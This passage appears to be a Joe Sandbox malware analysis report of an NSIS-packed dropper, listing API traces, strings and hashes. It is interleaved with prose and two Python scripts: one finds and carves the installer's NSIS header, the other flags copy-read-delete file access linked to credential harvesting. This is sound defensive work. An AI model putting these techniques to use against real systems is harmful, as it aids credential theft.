                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,00434000,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,00434000,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                      • Part of subcall function 004067EF: CharPrevW.USER32(?,?,771B3420,00436800,00000000,004034F7,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                    • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                                      • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                      • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                                      • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: A
                                                                    • API String ID: 2624150263-3554254475
                                                                    • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                    • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                                    • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                    • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004030B3
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
                                                                      • Part of subcall function 00406031: GetFileAttributesW.KERNEL32(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                      • Part of subcall function 00406031: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 0040311B
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00403251
                                                                    Strings
                                                                    • Null, xrefs: 00403199
                                                                    • Inst, xrefs: 00403187
                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                                    • Error launching installer, xrefs: 004030F2
                                                                    • soft, xrefs: 00403190
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                    • API String ID: 2803837635-527102705
                                                                    • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                    • Instruction ID: 0f45a59523ef10b9f6d61eaf83b2f91e1f12d324a613ce28672a4e7bf9d48b30
                                                                    • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                    • Instruction Fuzzy Hash: 7B51B071A01304AFDB209F65DD86B9E7FACAB08356F20417BF504B62D1CB789E818B5D
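The function block above (GetModuleFileNameW, CreateFileW on its own image, GetFileSize, GlobalAlloc, the dword strings "Null", "soft", "Inst" and the messages "Error launching installer" and "Installer integrity check has failed") is the start-up routine of the NSIS installer stub: it reads its own file in 512-byte chunks and tests every 512-byte-aligned offset for the signature 0xDEADBEEF followed by the twelve bytes "NullsoftInst", which the stub compares as the three dwords 'Null', 'soft', 'Inst'. The Python below is an added example, not code from the report or from the sample, that performs the same search on an installer image and applies the stub's coarse integrity check (the data length the header declares must fit inside the file). The image it scans is constructed in the block; field names follow the NSIS firstheader layout.

```python
"""Locate and sanity-check the NSIS 'firstheader' in an installer image.

Added example (not from the Joe Sandbox report). Reproduces the search the
NSIS stub performs on its own file at start-up. The image built by
build_image() is constructed test data, not the analysed sample.
"""
import struct
from typing import NamedTuple, Optional

FH_SIG = 0xDEADBEEF            # firstheader.siginfo
FH_MAGIC = b"NullsoftInst"     # firstheader.nsinst[0..2] = 'Null', 'soft', 'Inst'
FH_SIZE = 28                   # seven little-endian dwords
FH_ALIGN = 512                 # the stub reads and tests 512-byte chunks
FH_FLAGS_UNINSTALL = 0x1
FH_FLAGS_SILENT = 0x2
FH_FLAGS_NO_CRC = 0x4
FH_FLAGS_FORCE_CRC = 0x8
FH_FLAGS_MASK = 0xF            # any other flag bit set: not a header


class FirstHeader(NamedTuple):
    offset: int                        # file offset of the firstheader
    flags: int
    length_of_header: int              # size of the (compressed) header block
    length_of_all_following_data: int  # firstheader + header + datablock (+ CRC)


def parse_firstheader(image: bytes, off: int) -> Optional[FirstHeader]:
    """Return the firstheader at `off` if the 28 bytes there form one."""
    if off + FH_SIZE > len(image):
        return None
    flags, sig = struct.unpack_from("<II", image, off)
    if sig != FH_SIG or flags & ~FH_FLAGS_MASK:
        return None
    if image[off + 8:off + 20] != FH_MAGIC:
        return None
    hdr_len, data_len = struct.unpack_from("<II", image, off + 20)
    return FirstHeader(off, flags, hdr_len, data_len)


def find_firstheader(image: bytes) -> Optional[FirstHeader]:
    """Scan 512-byte-aligned offsets only, exactly as the stub does."""
    for off in range(0, len(image), FH_ALIGN):
        fh = parse_firstheader(image, off)
        if fh is not None:
            return fh
    return None


def integrity_ok(image: bytes, fh: FirstHeader) -> bool:
    """The stub's coarse check before any CRC: declared data must fit the file."""
    return fh.offset + fh.length_of_all_following_data <= len(image)


def describe(fh: FirstHeader) -> str:
    names = [name for bit, name in ((FH_FLAGS_UNINSTALL, "uninstall"),
                                    (FH_FLAGS_SILENT, "silent"),
                                    (FH_FLAGS_NO_CRC, "no-crc"),
                                    (FH_FLAGS_FORCE_CRC, "force-crc")) if fh.flags & bit]
    return (f"NSIS firstheader at 0x{fh.offset:X} flags={','.join(names) or 'none'} "
            f"header={fh.length_of_header} total={fh.length_of_all_following_data}")


def build_image(stub_size: int, header: bytes, data: bytes, flags: int = 0) -> bytes:
    """Constructed image: dummy stub padded to `stub_size`, then a firstheader,
    then `header` and `data`. Test data only, not a real installer."""
    stub = b"MZ" + b"\0" * (stub_size - 2)
    fh = struct.pack("<II", flags, FH_SIG) + FH_MAGIC
    fh += struct.pack("<II", len(header), FH_SIZE + len(header) + len(data))
    return stub + fh + header + data


if __name__ == "__main__":
    img = build_image(2048, b"H" * 40, b"D" * 100, FH_FLAGS_SILENT)
    found = find_firstheader(img)
    if found is None or not integrity_ok(img, found):
        print("Installer integrity check has failed")
    else:
        print(describe(found))
```

On a real dropper, pass the file bytes to find_firstheader() and, if integrity_ok() holds, the bytes from fh.offset + FH_SIZE onwards are the compressed header and datablock to carve; a header that is found but fails the size check is the condition under which the stub shows the integrity-failure message seen in the strings above.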
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1F7559EA
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F7559F6
                                                                    • _free.LIBCMT ref: 1F755A01
                                                                    • _free.LIBCMT ref: 1F755A0C
                                                                    • _free.LIBCMT ref: 1F755A17
                                                                    • _free.LIBCMT ref: 1F755A22
                                                                    • _free.LIBCMT ref: 1F755A2D
                                                                    • _free.LIBCMT ref: 1F755A38
                                                                    • _free.LIBCMT ref: 1F755A43
                                                                    • _free.LIBCMT ref: 1F755A51
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8657fb9fa9cc414369c1d8d8d57fa6bfba331ffce369fbccbfa373246390759f
                                                                    • Instruction ID: edc1748e4f2579988b13ca946604397af650c15f27d7ee2fd18be874f3592305
                                                                    • Opcode Fuzzy Hash: 8657fb9fa9cc414369c1d8d8d57fa6bfba331ffce369fbccbfa373246390759f
                                                                    • Instruction Fuzzy Hash: 70117F7E520248EFCB11DF94E845CDD3FA9EF88254B5585A5BA088F235DA32EA509B80
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(004279C0,00000400), ref: 004066A0
                                                                    • GetWindowsDirectoryW.KERNEL32(004279C0,00000400,00000000,00421EE8,?,?,00000000,00000000,?,00000000), ref: 004066B6
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,004279C0), ref: 00406714
                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040671D
                                                                    • lstrcatW.KERNEL32(004279C0,\Microsoft\Internet Explorer\Quick Launch,00000000,00421EE8,?,?,00000000,00000000,?,00000000), ref: 00406748
                                                                    • lstrlenW.KERNEL32(004279C0,00000000,00421EE8,?,?,00000000,00000000,?,00000000), ref: 004067A2
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406671
                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406742
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                    • API String ID: 4024019347-730719616
                                                                    • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                    • Instruction ID: 9d84e59ac7151f7caf92dcd2fae633819e279481621c74ff0a59597acd22528a
                                                                    • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                    • Instruction Fuzzy Hash: 46612471A047119BD7209F28DC80B7A77E4AF58328F65053FF686B32D0DA3C89A5875E
                                                                    APIs
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D1B
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1F751D37
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D4B
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D58
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D72
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D7D
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D8A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 1454806937-0
                                                                    • Opcode ID: 5983c268f4e20f390337ba49adaa450e14e124897dceeb8cb1ea03a67a2dddfb
                                                                    • Instruction ID: 7e2b16cf90c2ea0814ca3ea53da2c20e30fa9f3ec8285d869df3291c121d6cfc
                                                                    • Opcode Fuzzy Hash: 5983c268f4e20f390337ba49adaa450e14e124897dceeb8cb1ea03a67a2dddfb
                                                                    • Instruction Fuzzy Hash: 392130B194122CBFD710DBA0DCCCEEB76ACEB4C365F0005A6F515D2150E6B19E9A8BB0
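The routine above, in the unpacked 1F750000 region, copies a file, opens the copy with CreateFileW(dwDesiredAccess=80000000 GENERIC_READ, dwCreationDisposition=00000003 OPEN_EXISTING), reads it in one go and deletes it. That copy, read, delete sequence is how a file another process holds open with a sharing lock is read, and it fits the report's browser- and mail-credential harvesting signatures. The Python below is an added example, not part of the report, that parses this listing's "APIs" block format and flags functions showing that sequence. Its SAMPLE text is constructed from lines on this page (this routine, the GDI routine at 00404544 and the head of the stub at 004030B3); the argument columns carry more stack dwords than the API takes, so only the leading ones are treated as parameters.

```python
"""Parse Joe Sandbox 'APIs' blocks and flag copy / read-only open / read /
delete file access. Added example, not code from the report. SAMPLE is
constructed from lines of the listing on this page.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

GENERIC_READ = 0x80000000
OPEN_EXISTING = 3

# "• Api.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function X:"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

SAMPLE = """\
APIs
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D1B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1F751D37
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D4B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D58
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D72
• CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D7D
• DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D8A
Memory Dump Source
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404544
• GetSysColor.USER32(00000000), ref: 00404582
• SetTextColor.GDI32(?,00000000), ref: 0040458E
Memory Dump Source
APIs
• GetTickCount.KERNEL32 ref: 004030B3
• GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 004030CF
  • Part of subcall function 00406031: GetFileAttributesW.KERNEL32(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
• GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003), ref: 0040311B
Strings
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]             # raw dwords as printed; '?' = unresolved
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # set when the call happens inside a callee


def parse_blocks(text: str) -> List[List[ApiCall]]:
    """Split the listing into per-function API blocks."""
    blocks: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            blocks.append(current)
        elif line in ("Strings", "Memory Dump Source"):
            current = None
        elif current is not None:
            m = API_LINE.match(raw)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                current.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                       int(m["sub"], 16) if m["sub"] else None))
    return blocks


def _dword(tok: str) -> Optional[int]:
    return None if tok == "?" else int(tok, 16)


def create_file_params(call: ApiCall) -> Tuple[Optional[int], Optional[int]]:
    """(dwDesiredAccess, dwCreationDisposition) of a CreateFileA/W call."""
    if call.api.rstrip("AW") != "CreateFile" or len(call.args) < 5:
        return (None, None)
    return (_dword(call.args[1]), _dword(call.args[4]))


def reads_via_temp_copy(block: List[ApiCall]) -> bool:
    """True when a function copies a file, opens an existing file read-only,
    reads it and deletes a file, in that order (the 1F751D1B routine)."""
    want = ["CopyFile", "CreateFile", "ReadFile", "DeleteFile"]
    i = 0
    for call in block:
        if call.subcall_of is not None or i == len(want):
            continue
        if call.api.rstrip("AW") != want[i]:
            continue
        if want[i] == "CreateFile":
            access, disposition = create_file_params(call)
            if access != GENERIC_READ or disposition != OPEN_EXISTING:
                continue
        i += 1
    return i == len(want)


def flag_blocks(text: str) -> List[int]:
    """Call-site address of the first call of every flagged function block."""
    return [b[0].ref for b in parse_blocks(text) if b and reads_via_temp_copy(b)]


if __name__ == "__main__":
    for ref in flag_blocks(SAMPLE):
        print(f"copy/read/delete file access in function block starting at {ref:08X}")
```

Feed it the exported text of the whole function listing to get every routine with this shape; pairing the flagged addresses with the "Strings" of the same block (file names, registry paths) tells you what is being copied out.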
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                                    • GetSysColor.USER32(00000000), ref: 00404582
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                                    • SetBkMode.GDI32(?,?), ref: 0040459A
                                                                    • GetSysColor.USER32(?), ref: 004045AD
                                                                    • SetBkColor.GDI32(?,?), ref: 004045BD
                                                                    • DeleteObject.GDI32(?), ref: 004045D7
                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                    • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                    • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                                    APIs
                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                      • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                    • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                                    • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                    • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,1F759C07,?,00000000,?,00000000,00000000), ref: 1F7594D4
                                                                    • __fassign.LIBCMT ref: 1F75954F
                                                                    • __fassign.LIBCMT ref: 1F75956A
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 1F759590
                                                                    • WriteFile.KERNEL32(?,?,00000000,1F759C07,00000000,?,?,?,?,?,?,?,?,?,1F759C07,?), ref: 1F7595AF
                                                                    • WriteFile.KERNEL32(?,?,00000001,1F759C07,00000000,?,?,?,?,?,?,?,?,?,1F759C07,?), ref: 1F7595E8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: 006ae9f9fdb13093186cc883420f2903674170b5e0064e8e219f8fefaa8c5d4a
                                                                    • Instruction ID: 927097a11f8daf550de0b098cbc06b11238ca51d4abd6073383d6eac63f7b83d
                                                                    • Opcode Fuzzy Hash: 006ae9f9fdb13093186cc883420f2903674170b5e0064e8e219f8fefaa8c5d4a
                                                                    • Instruction Fuzzy Hash: D7510770D00249AFDB00CFA4D895AEEFBF9FF49310F10411AE956E72A1E730A955CBA0
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 1F75339B
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 1F7533A3
                                                                    • _ValidateLocalCookies.LIBCMT ref: 1F753431
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 1F75345C
                                                                    • _ValidateLocalCookies.LIBCMT ref: 1F7534B1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: f1dbf8c53b8a8fcaa99ce3ae70e8b979918c9c544825ad81109a13bb5729e7f5
                                                                    • Instruction ID: f82a33e119e3f9d5ff3dd9c75973256d57c27cf1a51fa147290f440f940cf911
                                                                    • Opcode Fuzzy Hash: f1dbf8c53b8a8fcaa99ce3ae70e8b979918c9c544825ad81109a13bb5729e7f5
                                                                    • Instruction Fuzzy Hash: 1E41C634E00219ABCF41CF68D884AAEBBB7AF49324F108159E8159B371D735EA15CB91
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00421EE8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                    • lstrlenW.KERNEL32(00403412,00421EE8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                    • lstrcatW.KERNEL32(00421EE8,00403412,00403412,00421EE8,00000000,?,00000000), ref: 00405621
                                                                    • SetWindowTextW.USER32(00421EE8,00421EE8), ref: 00405633
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2531174081-0
                                                                    • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                    • Instruction ID: 832834c51e0bf9a0f82df7ca1b5cea98aaac4e2da268f37eaeed00ca70cd3c8d
                                                                    • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                    • Instruction Fuzzy Hash: BA21A175900558BACB119FA5DD84DCFBF79EF45350F50843AF904B22A0C77A4A41CF58
                                                                    APIs
                                                                      • Part of subcall function 1F759221: _free.LIBCMT ref: 1F75924A
                                                                    • _free.LIBCMT ref: 1F7592AB
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F7592B6
                                                                    • _free.LIBCMT ref: 1F7592C1
                                                                    • _free.LIBCMT ref: 1F759315
                                                                    • _free.LIBCMT ref: 1F759320
                                                                    • _free.LIBCMT ref: 1F75932B
